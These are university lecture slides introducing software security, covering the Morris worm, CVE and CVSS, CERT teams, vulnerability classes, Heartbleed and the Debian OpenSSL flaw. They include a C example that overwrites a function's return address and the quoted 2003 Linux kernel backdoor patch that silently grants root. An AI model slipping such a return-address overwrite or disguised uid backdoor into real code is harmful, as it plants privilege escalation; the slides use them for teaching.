Scribd
Upload
9 views

Introduction To Software Security-Slides

Uploaded by

Mayouf
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
9 views

Introduction To Software Security-Slides

Uploaded by

Mayouf
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 55

Introduction to Software Security

(Wake up, Neo. . . )

Emmanuel Fleury
<[email protected]>

LaBRI, Université de Bordeaux, France

October 8, 2019

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 1 / 53


Overview

1 Motivations

2 What is ’Software Security’ ?

3 Security Vulnerabilities

4 Malware Alerts

5 Software Vulnerabilities

6 Examples of Real Flaws

7 Course Overview

8 References & Further Readings

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 2 / 53


Overview

1 Motivations

2 What is ’Software Security’ ?

3 Security Vulnerabilities

4 Malware Alerts

5 Software Vulnerabilities

6 Examples of Real Flaws

7 Course Overview

8 References & Further Readings

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 3 / 53


Internet is under attack !!!
Newsgroups: comp.risks
Subject: Virus on the Arpanet - Milnet
<[email protected]> Thu, 3 Nov 88 06:46 EST

Hi Gang!

It's now 3:45 AM on Wednesday 3 November 1988. I'm tired, so don't believe
everything that follows... Apparently, there is a massive attack on Unix
systems going on right now.

I have spoken to systems managers at several computers, on both the east & west
coast, and I suspect this may be a system wide problem. Symptom: hundreds or
thousands of jobs start running on a Unix system bringing response to zero.

[...]

This virus is spreading very quickly over the Milnet. Within the past 4 hours,
I have evidence that it has hit >10 sites across the country, both Arpanet and
Milnet sites. I suspect that well over 50 sites have been hit. Most of these
are "major" sites and gateways.

[...]

This is bad news.

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 4 / 53


An Autopsy of the ’Morris Worm’ Case
Nov. 2, 1988, 6PM (East Coast Time), New-York:
Morris drop his worm on the network of the MIT Artificial Intelligence Lab.
Nov. 2, 1988, 7PM (East Coast Time), Berkeley:
Berkeley main Gateway get infected.
Nov. 3, 1988, 6AM (East Coast Time), All over US:
After a night spent fighting the worm system administrators start to gather
information and organize resistance. At this time about 2,500 backbones are down
thus almost shutting down the Internet.
Nov. 4, 1988, Berkeley, Usenix Conference:
A lot of the most talented system administrators from US were attending Usenix
conference in Berkeley and had to solve the problem remotely from there (most of
the time by phone as they can’t log on their server). A first analysis of the Worm is
presented at one of the Workshop and patches start to get forged.
Several days later:
The worm is eradicated from the backbones of Internet, security updates and
patches are applied. Morris is arrested at his university.

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 5 / 53


Sequel of Morris Worm

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 6 / 53


What We Learned from the Worm
People are more dependant of information networks than they
could think (nowadays, they also share a lot more sensitive
information than they think without being prepared for it);
Internet is sensitive to massive network attacks;
Internet security is a World wide problem.
There is a need for computer security experts able to deal
with such alerts. Forging patches against new attacks, inventing
better counter-measures, staying ahead from potential attackers.
There is a need for central agencies gathering informations
and coordinating efforts about computer security issues.

There is a need for an international community of experts


exchanging about computer security in real-time.

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 7 / 53


Vulnerability Statistics (CERT|CC)

Year #Vulnerabilities
1999 894
·104 2000 1,020
2001 1,677
2002 2,156
1.5 2003 1,527
2004 2,451
2005 4,935
#Vulnerabilities

2006 6,610
1 2007 6,520
2008 5,632
2009 5,736
2010 4,652
0.5 2011 4,155
2012 5,297
2013 5,191
2014 7,946
0 2015 6,480
2016 6,447
2000 2005 2010 2015 2017 14,714
Year 2018 16,555
2019 424

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 8 / 53


Overview

1 Motivations

2 What is ’Software Security’ ?

3 Security Vulnerabilities

4 Malware Alerts

5 Software Vulnerabilities

6 Examples of Real Flaws

7 Course Overview

8 References & Further Readings

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 9 / 53


Computer Security
Security is “the freedom of danger, risk and loss ”.

Data Cryptography,
Security Cryptanalysis,
...

Computer Protocol Cryptographic Protocols,


Security Network Security,
Security ...

Software Application Security,


Security Operating System Security,
...

Data Security: Protect/Attack static data;


Protocol Security: Protect/Attack data exchanges;
Software Security: Protect/Attack computer programs.
Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 10 / 53
Software Security Goals
Software Security “Spirit”
Software Security is about preventing/finding misusage of computer programs in
order to gain unauthorized capabilities or knowledge.

Application Security:
Lies in user-space;
Attacker
Concerned about usual programming errors:
Buffer-overflows, heap-overflows, format string bugs, . . . Users

Operating System Security: Root


Lies in kernel-space;
Concerned about structural security: Kernel
Access control, randomization of process memory layout,
data execution prevention, . . .

Software Obfuscation/Reverse-engineering:
Extracting knowledge from pieces of software:
Disassembler, cfg-recovery, decompiler, obfuscators, . . .

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 11 / 53


Security Flaws: Why ?

Computer programs are complex and long !


They need experts to be handled properly.

Programs interact with each others in an unpredictable way.

Networks leverage program interactions of several magnitude


orders.

Internet is an extremely hostile place where you cannot hide.

What You See Is Not What You eXecute (WYSINWYX).


(see next slides. . . )

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 12 / 53


Architectural Models
Harvard Architecture

First implemented in the Mark I (1944).


CPU
Keep program and data separated. Bus Bus
Allows to fetch data and instructions in the
same time. Program Data
Simple to handle for programmers but less Memory Memory
powerful for computers.

Princeton Architecture

First implemented in the ENIAC (1946).


CPU
Allows self-modifying code and entanglement Bus
of program and data.
Difficult to handle for programmers but more Memory
powerful for computers. (program and data)

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 13 / 53


What Consequences on Real World?
Facts about modern software:
Programmers are coding in Harvard architecture.
Machines are executing code in Princeton architecture.
Compilers translate code from Harvard to Princeton architecture.
But, a few is lost in translation. . . and some bugs may allow malicious users
to access unauthorized features through unexpected behaviors.

Most of the security issues in software security are


coming from a misunderstanding of the coupling of
these two architectures.
And, some of the computer security experts see exploitation as
“Programming Weird Machine”
(using such “machine” outside of its specifications).

∗ “What You See Is Not What You Execute” (WYSINWYX) is a term coined by Gogul Balakrishnan and Thomas Reps in 2007.

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 14 / 53


A Magic Example
#include <stdio.h>
#include <stdint.h>

int foo (void) { What will be the output ?


char buffer[8];
char * ret;
1 ‘1’
ret = buffer + 24;
(*ret) += 7;
2 ‘0’
return 0; 3 ‘-1’
}
4 ‘Segmentation fault’
int main (void) {
int i = 0;
foo ();
i = 1;
printf ("%d\n", i);
return 0;
}

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 15 / 53


A Magic Example
#include <stdio.h>
#include <stdint.h>

int foo (void) { What will be the output ?


char buffer[8];
char * ret;
1 ‘1’
ret = buffer + 24;
(*ret) += 7;
2 ‘0’
return 0; 3 ‘-1’
}
4 ‘Segmentation fault’
int main (void) {
int i = 0;
foo ();
i = 1; Let’s try it !
printf ("%d\n", i);
return 0;
}

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 15 / 53


Overview

1 Motivations

2 What is ’Software Security’ ?

3 Security Vulnerabilities

4 Malware Alerts

5 Software Vulnerabilities

6 Examples of Real Flaws

7 Course Overview

8 References & Further Readings

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 16 / 53


Managing Security Vulnerabilities

Discovering and Listing all the known vulnerabilities.

Registering Security Issue Process


1 Discover: Find a potential threat in a product;
2 Submission: Notification by users or analysts on a specific product;
3 Triage: Recognize already registered issues and dropping it;
4 Registration: Give a recognizable name;
5 Analysis: Understanding the issue in depth;
6 Fix: Solving the issue in the product.

We need a unique ID for each vulnerability!


Helps to quickly identify and analyze a vulnerability.
Requires a central structure to assign IDs!
Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 17 / 53
Common Vulnerabilities and Exposures
Discover
CVE Numbering Authority (CNA)
Submit CNA are entities in charge of triaging issue
submissions and analyzing it. Each product
Known Triage
Issue (or family of products) has a dedicated CNA.

Candidate ID
CVE-YYYY-NNNN...N CVE - 2014 - 0224
Not an Issue Analysis Year of Unique ID
CVE prefix
discovery assigned by CNA
Official CVE ID
CVE-YYYY-NNNN...N Examples
Each CVE Identifier includes: CVE-2014-0160 (Heartbleed)
CVE Identifier number CVE-2014-6271 (Shellshock)
(CVE-1999-0067, CVE-2014-100001)
CVE-2015-0235 (GHOST: glibc vulnerability)
Brief description of the security
vulnerability or exposure. CVE-2016-0800 (DROWN Attack)
Any pertinent references CVE-2016-5195 (Dirty COW)
(vulnerability reports and advisories).

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 18 / 53


CNAs List (Software Vendors)
Adobe Systems Incorporated Juniper Networks, Inc.
Apache Software Foundation Lenovo Group Ltd.
Apple Inc. MarkLogic Corporation
BlackBerry McAfee (formerly Intel Security)
Brocade Communications Systems, Inc. Micro Focus
Check Point Software Technologies Ltd. Microsoft Corporation
Cisco Systems, Inc. Mozilla Corporation
Debian GNU/Linux Nvidia Corporation
Dell EMC Objective Development Software GmbH
F5 Networks, Inc. OpenSSL Software Foundation
Fortinet, Inc. Oracle
FreeBSD Puppet
Google Inc. (Chrome and Android issues) Red Hat, Inc. (Linux issues only)
Hewlett Packard Inc. Silicon Graphics, Inc.
Huawei Technologies Co., Ltd. Symantec Corporation
IBM Corporation Ubuntu Linux
Intel Corporation VMWare
Internet Systems Consortium Yandex N.V.

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 19 / 53


CVE – Issue Sheet

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 20 / 53


CVE – Homepage

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 21 / 53


CVE – Web Form Submission

Request Type

Request up to 10 IDs

Confirm vulnerability
is still unknown

Vulnerability
Type

Provide required
information

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 22 / 53


CVE Details – Homepage

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 23 / 53


CVE Details – Product

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 24 / 53


CVE Details – Issue

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 25 / 53


Common Vulnerability Scoring System

Attack Vector (Example)


Type Description Score
Local (L) Attacker must either have physical access or a local account. 0.395
Adjacent Network (A) Attacker must have access to the broadcast or collision domain 0.646
of the vulnerable system.
Network (N) Full remote exploitation. 1.0

BaseScore = RoundUp(Min(Impact + Exploitability, 10))

Exploitability = 8.22 × AttackVector × AttackComplexity × PrivilegeRequired × UserInteraction


Impact = 10.41 × (1 - (1 - ConfImpact) × (1 - IntegImpact) × (1 - AvailImpact))
Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 26 / 53
Overview

1 Motivations

2 What is ’Software Security’ ?

3 Security Vulnerabilities

4 Malware Alerts

5 Software Vulnerabilities

6 Examples of Real Flaws

7 Course Overview

8 References & Further Readings

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 27 / 53


Managing Malware Alerts

Report Malware Alerts or Intrusion


1 Discovery: Notification by users or analysts;
2 Triaging: Recognize already registered malware;
3 Registration: Give a recognizable and unique name;
4 Analysis: Understanding the malware in depth;
5 Detection: Get a recognizable signature of it.

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 28 / 53


Virustotal – Homepage

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 29 / 53


Virustotal – Virus Scan

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 30 / 53


Virustotal – Virus Scan

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 30 / 53


Computer Security Incident Response Team

CERT/CSIRT Goals

Coordinate Alerts and Warnings; Security Training and Education;


Incident Handling (analysis and responses); Intelligence and Research in Security;
Vulnerability Handling (analysis and responses); Coordination with other CERT/CSIRT.

French CERT/CSIRT
CERT-FR (French administration)
CERT Crédit Agricole
CERT-DEVOTEAM
Airbus Cybersecurity
Cert-IST (Alcatel, CNES, ELF (Total))
CERT Banque de France
CERT-LAPOSTE
CSIRT ATOS
CERT-LEXSI (Labo. d’EXpertise en Sécurité Informatique)
Airbus Group CERT
CERT-RENATER
CERT Capgemini-Sogeti
CERT-societegenerale
CERT SEKOIA
CERT-XMCO
CERT UBIK
CSIRT-BNP Paribas
CERT Caisse des Dépôts (CERT-CDCFR)
Orange-CERT-CC
CERT OSIRIS (Université de Strasbourg)
CERT-SOLUCOM

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 31 / 53


CERT-FR – Homepage

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 32 / 53


On-line Vulnerability Advisory Databases
US Computer Emergency Readiness Team (US-CERT)
http://www.kb.cert.org/vuls/
Common Vulnerabilities and Exposures (CVE)
http://cve.mitre.org/
CVE Details
https://www.cvedetails.com/
Packet Storm Security
https://packetstormsecurity.com/
National Vulnerability Database (NVD)
http://nvd.nist.gov/
Debian Security Advisory (DSA)
http://www.debian.org/security/
Agence Nationale de la Sécurité des Systèmes d’Information (ANSSI)
http://www.ssi.gouv.fr/
CERT-FR
http://cert.ssi.gouv.fr/cert-fr/certfr.html
Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 33 / 53
Overview

1 Motivations

2 What is ’Software Security’ ?

3 Security Vulnerabilities

4 Malware Alerts

5 Software Vulnerabilities

6 Examples of Real Flaws

7 Course Overview

8 References & Further Readings

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 34 / 53


Typology of Software Security Risks

Threat
A threat is a way for an attacker to misuse the program in an unexpected manner.
Threats are coming from:
Algorithm Flaws: Design error at the algorithmic level.
Program Bugs: Programming error leading to some unexpected behavior.

Threats are potential security issues.

Vulnerability
A vulnerability is a threat which can be used to gain some unexpected advantages.
Vulnerabilities are embodied through:
Proofs of Concept: Program pinpointing the problem (usually not harmful).
Exploits: Program using the problem to effectively gain unauthorized capabilities.
Vulnerabilities are actual security issues.

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 35 / 53


Where Vulnerabilities can lie ?

Program = Data + Algorithm + and more. . .

Attackers always target the weakest point:


Information Flow
Modify or control data values, inject arbitrary code, . . .

Execution Flow
Modify or control the running process by program counter overwriting,
return-into-libc attacks, symbol overload, . . .

Resources
Exhaust available resources (denial of service), spoof trusted resources
(man-in-the-middle), . . .

Users
Social engineering, Malwares (trojan horses, viruses, rootkits, . . . ), human mistakes
(weak passwords, bad habits, . . . ).

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 36 / 53


Vulnerabilities Classification
Remote/Local Exploit
An attacker can exploit it from remote (resp. local) location.
Information Leakage/Disclosure
Some private information can be captured by the attacker.
Identity Theft
The attacker can pretend be someone else.
Privilege Escalation (Root Exploit)
The attacker can upgrade his privileges (resp. up to the root level).
Arbitrary Command Execution
The attacker can run any program which is available from the target.
Arbitrary Code Execution
The attacker can inject any program in the target and execute it.
Denial of Service
The attacker can deny access (temporarily or permanently) to a service.
...
Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 37 / 53
Examples
Debian Security Advisory (DSA) list
Advisory ID Package(s) Correction(s)

DSA 725 ppxp Local root exploit


DSA 986 gnutls11 Arbitrary code execution
DSA 1017 Linux Kernel 2.6.8 Several vulnerabilities
DSA 1018 Linux Kernel 2.4.27 Several vulnerabilities
DSA 1027 mailman Denial of service
DSA 1032 zope-cmfplone Unprivileged data manipulation
DSA 1035 fcheck Insecure temporary file creation
DSA 1036 bsdgames Local privilege escalation
DSA 1037 zgv Arbitrary code execution
DSA 1038 xzgv Arbitrary code execution
DSA 1039 blender Several vulnerabilities
DSA 1040 gdm Local root exploit
DSA 1041 abc2ps Arbitrary code execution
DSA 1042 cyrus-sasl2 Denial of service
DSA 1043 abcmidi Arbitrary code execution
DSA 1044 mozilla-firefox Several vulnerabilities
DSA 1045 openvpn Arbitrary code execution
DSA 1046 mozilla Several vulnerabilities
DSA 1047 resmgr Unauthorised access
DSA 1048 asterisk Arbitrary code execution
DSA 1049 ethereal Several vulnerabilities
DSA 1050 clamav Arbitrary code execution
...

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 38 / 53


Overview

1 Motivations

2 What is ’Software Security’ ?

3 Security Vulnerabilities

4 Malware Alerts

5 Software Vulnerabilities

6 Examples of Real Flaws

7 Course Overview

8 References & Further Readings

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 39 / 53


The Heartbleed Bug
Normal Use
Step 1: Send a string and the string
length to the server;
Step 2: The server receive the message
and reply by sending back the string;
Step 3: The client get the string back.

Triggering the Flaw


Step 1: Send the smallest string
possible and the maximum string length
to the server;
Step 2: The server receive the message
and reply by sending back the minimal
string and part of the process memory;
Step 3: The client get the string back
plus extra-information.

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 40 / 53


The Debian OpenSSL Debacle I

CVE-ID: CVE-2008-0166
Description: OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on
Debian-based operating systems uses a random number generator that
generates predictable numbers, which makes it easier for remote attackers to
conduct brute force guessing attacks against cryptographic keys.
References:
MILW0RM:5622
http://www.milw0rm.com/exploits/5622
MILW0RM:5632
http://www.milw0rm.com/exploits/5632
MILW0RM:5720
http://www.milw0rm.com/exploits/5720
DEBIAN:DSA-1571
http://www.debian.org/security/2008/dsa-1571
DEBIAN:DSA-1576
http://www.debian.org/security/2008/dsa-1576
...

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 41 / 53


The Debian OpenSSL Debacle II
DSA-1571-1 openssl -- predictable random number generator
Date Reported: 13 May 2008
Affected Packages: openssl
Vulnerable: Yes
Security database references: In Mitre's CVE dictionary: CVE-2008-0166.

More information: Luciano Bello discovered that the random number generator in Debian's
openssl package is predictable. This is caused by an incorrect Debian-specific change to the
openssl package (CVE-2008-0166). As a result, cryptographic key material may be guessable.

This is a Debian-specific vulnerability which does not affect other operating systems
which are not based on Debian. However, other systems can be indirectly affected if
weak keys are imported into them.

It is strongly recommended that all cryptographic key material which has been generated
by OpenSSL versions starting with 0.9.8c-1 on Debian systems is recreated from scratch.
Furthermore, all DSA keys ever used on affected Debian systems for signing or
authentication purposes should be considered compromised; the Digital Signature Algorithm
relies on a secret random value used during signature generation.

The first vulnerable version, 0.9.8c-1, was uploaded to the unstable distribution on
2006-09-17, and has since that date propagated to the testing and current stable (etch)
distributions. The old stable distribution (sarge) is not affected.

Affected keys include SSH keys, OpenVPN keys, DNSSEC keys, and key material for use in
X.509 certificates and session keys used in SSL/TLS connections. Keys generated with GnuPG
or GNUTLS are not affected, though.

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 42 / 53


Attempt to insert a backdoor in Linux
In November 2003, kernel developers noticed that an attacker tried to sneak a
patch into the kernel sources of kernel/exit.c (see ‘man clone’).

Rogue Patch
--- kernel/exit.c GOOD 2003-11-05 13:46:44.000000000 -0800
+++ kernel/exit.c BAD 2003-11-05 13:46:53.000000000 -0800
@@ -1111,6 +1111,8 @@
schedule();
goto repeat;
}
+ if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+ retval = -EINVAL;
retval = -ECHILD;
end_wait4:
current->state = TASK_RUNNING;

1 What are the effects of the patch when the flags WCLONE and WALL are true ?
2 Would it be possible to have a remote exploit of this backdoor ?

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 43 / 53


Overview

1 Motivations

2 What is ’Software Security’ ?

3 Security Vulnerabilities

4 Malware Alerts

5 Software Vulnerabilities

6 Examples of Real Flaws

7 Course Overview

8 References & Further Readings

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 44 / 53


Goals of the Course
Securing Systems
Be aware of main attacks/counter-measures;
Be able to find information and understand new security
techniques;
Risk evaluation of a computer system or a program.

Secure Programming
Better understanding the limits of software security;
Better knowledge on what is going “backstage”.

Code Security Auditing


Find software weaknesses and estimate threat;
Understand security advisories.

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 45 / 53


Course Outline
1 Introduction to Software Security
2 Usual Programming Flaws
3 x86 Assembly Language (Part I)
4 x86 Assembly Language (Part II)
5 Executable files
6 Shellcodes
7 Basic stack-overflows
8 Advanced stack-overflows
9 Heap-overflows
10 Format strings and more. . .
11 Obfuscation & Reverse-Engineering
12 Digital Forensic
Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 46 / 53
Grading

Homeworks [1/2]
(challenges from https://www.root-me.org/ (App-system, Cracking))

1 Exam [1/2]
(December, duration: 3h, all documents allowed)

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 47 / 53


Course Website

Course
http://www.labri.fr/~fleury/courses/software-security/

What you can find on the course website


Syllabus;
Course Agenda;
Slides;
Exercises;
References;
And more. . .
(articles, manuals, books, code samples, . . . ).

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 48 / 53


Overview

1 Motivations

2 What is ’Software Security’ ?

3 Security Vulnerabilities

4 Malware Alerts

5 Software Vulnerabilities

6 Examples of Real Flaws

7 Course Overview

8 References & Further Readings

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 49 / 53


References & Further Readings

Magazines
Misc (Diamond Editions)
Phrack (http://www.phrack.org)

Blogs and others


LiveOverflow (https://liveoverflow.com/)
A Few Thoughts on Cryptographic Engineering
(http://blog.cryptographyengineering.com/)

Podcasts
NoLimitSecu (https://www.nolimitsecu.fr/)
Le Comptoir Sécu (https://www.comptoirsecu.fr/podcast/)
Security Now (https://www.grc.com/securitynow.htm)

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 50 / 53


Next Time. . .

Nebula Challenges

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 51 / 53


Books I
Chris Anley, John Heasman, Felix Linder, and Gerardo Richarte.
The Shellcoder’s Handbook: Discovering and Exploiting Security Holes.
John Wiley & Sons, 2nd edition, 2007.
Bruce Dang, Alexandre Gazet, Elias Bachaalany, and Sébastien Josse.
Practical Reverse Engineering: x86, x64, ARM, Windows Kernel, Reversing
Tools, and Obfuscation.
John Wiley & Sons, 2014.
Eldad Eilam.
Reversing: Secrets of Reverse Engineering.
John Wiley & Sons, 2005.
Jon Erickson.
Hacking: The Art of Exploitation.
No Starch Press, 2nd edition, 2007.
Randall Hyde.
The Art of Assembly Language.
No Starch, 2003.

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 52 / 53


Books II

Michael Hale Ligh, Andrew Case, Jamie Levy, and Aaron Walters.
The Art of Memory Forensics: Detecting Malware and Threats in Windows,
Linux, and Mac Memory.
John Wiley & Sons, 2014.
Ryan O’Neill.
Learning Linux Binary Analysis.
Packt Publishing, 2016.
Robert C. Seacord.
Secure Coding in C and C++.
SEI Series. Addison Wesley, 2nd edition, 2013.
Michael Sikorski and Andrew Honig.
Practical Malware Analysis: A Hands-On Guide to Dissecting Malicious
Software.
No Starch Press, 2012.

Emmanuel Fleury (LaBRI, France) Introduction to Software Security October 8, 2019 53 / 53

You might also like